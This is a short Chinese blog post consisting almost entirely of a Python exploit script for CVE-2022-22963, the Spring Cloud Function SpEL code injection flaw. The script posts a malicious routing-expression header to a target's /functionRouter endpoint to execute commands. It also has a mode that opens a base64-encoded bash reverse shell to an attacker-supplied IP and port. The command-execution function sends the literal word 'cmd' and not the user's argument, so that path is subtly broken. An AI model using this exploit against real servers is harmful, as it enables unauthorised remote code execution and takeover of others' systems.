CVE-2022-22963 

# Spring Cloud Function SpEL 代码注入 (CVE-2022-22963)

import requests
import argparse
import base64



headers = {
    "Accept-Encoding": "gzip, deflate",
    "Accept": "*/*",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
    "Connection": "close",
    "Content-Type": "application/x-www-form-urlencoded",

}
data = 'test'
def poc(url, cmd):
    ur = "/functionRouter"
    payload = {
        **headers,
        'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("cmd")',
    }
    data = 'test'
    requests.post(url=url + ur, headers=payload, data=data,verify=False)


def shell(url, ip, prot):
    ur = "/functionRouter"
    sh = f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
    data1 = sh.encode('utf-8')
    encoded_data = base64.b64encode(data1)
    encoded_sh = encoded_data.decode('utf-8')
    shel = 'bash -c {echo,123}|{base64,-d}|{bash,-i}'
    cmd = shel.replace("123", encoded_sh)
    payload = {
        **headers,
        'spring.cloud.function.routing-expression': 'T(java.lang.Runtime).getRuntime().exec("' + cmd + '")',
    }
    data = 'test'
    requests.post(url=url + ur, headers=payload, data=data,verify=False)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', dest='url', help='输入url')
    parser.add_argument('-c', '--cmd', dest='cmd', help='输入要执行的命令')
    parser.add_argument('-i', '--ip', dest='ip', help='输入反弹ip')
    parser.add_argument('-p', '--prot', dest='prot', help='输入反弹端口')
    args = parser.parse_args()

    if args.ip and args.prot:
        shell(args.url, args.ip, args.prot)
    elif args.url:
        poc(args.url, args.cmd)
    else:
        print('-h 帮助')


if __name__ == '__main__':
    main()
posted @ 2023-05-23 18:17  crayonxiaoxin  阅读(201)  评论(0编辑  收藏  举报